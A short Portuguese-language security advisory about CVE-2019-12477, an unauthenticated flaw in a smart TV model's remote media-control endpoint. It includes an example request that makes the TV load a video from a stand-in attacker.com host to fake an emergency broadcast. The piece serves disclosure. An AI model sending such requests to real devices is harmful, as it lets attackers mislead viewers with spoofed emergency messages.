Este modelo de smartTV permite incluir qualquer tipo de ficheiro remotamente através de uma função designada por "openLiveURL", a qual permite que um atacante consiga fazer broadcast de um vídeo falso sem qualquer tipo de autenticação. Esta falha é dada pelo CVE 2019-12477.
O diretório específico que está vulnerável a esta falha é:
/remote/media_control?action=setUri&uri=URI
Esta falha está também visível a partir do código-fonte, portanto através de uma inspeção cuidada do mesmo, é possível verificar que os pedidos feitos a este parâmetro podem ser alterados e executar a falha.
Tudo o que o atacante precisa de fazer é enviar um pedido especial ao url citado, por exemplo, http://xx.xx.xx.xx/remote//media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8
Apesar de o URL aceitar o formato .m3u8, tudo o que o atacante precisa de fazer é um pedido através do programa cURL, como por exemplo "curl --v -X GET". Este comando irá fazer essencialmente com o que o cliente faça um pedido "GET" a esse recurso web, não precisando de autenticação para tal. Em termos de impacto, o que o atacante pode fazer é simular uma mensagem de emergência.
Não existe ainda solução para este problema, mas espera-se que a marca lance uma correção durante as próximas semanas.
Mais informações aqui: https://www.inputzero.io/2019/06/hacking-smart-tv.html